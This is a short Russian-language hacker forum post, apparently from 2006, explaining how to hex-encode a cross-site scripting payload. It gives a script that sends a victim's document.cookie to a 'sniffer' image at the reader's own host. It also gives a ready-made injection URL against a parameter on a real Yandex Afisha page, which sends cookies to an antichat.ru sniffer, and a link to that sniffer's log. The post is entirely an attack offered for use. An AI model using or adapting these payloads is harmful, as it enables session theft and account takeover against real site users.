ВообЩем кто не понял... заходим к примеру на http://ha.ckers.org/xss.html
там в самон низу есть
Character Encoding Calculator
ASCII Text:
значит сюда вбиваем "><script>img = new Image(); img.src = "http://site/ваш_сниф.gif?"+document.cookie;</script>
и жМЁм Encode и получаем в строке Hex Value: наШу хренотень..и вставляем куда надо..
аВось кто ПлюсиК поставит...
Последний раз редактировалось DimOnOID; 18.12.2006 в 21:38..
Или так:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city="><script>img=n ew%20Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"%2Bdocument.cookie</script>
Лог смотри тут:
http://antichat.ru/sniff/log.php
---
Там плюс вырезался.
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•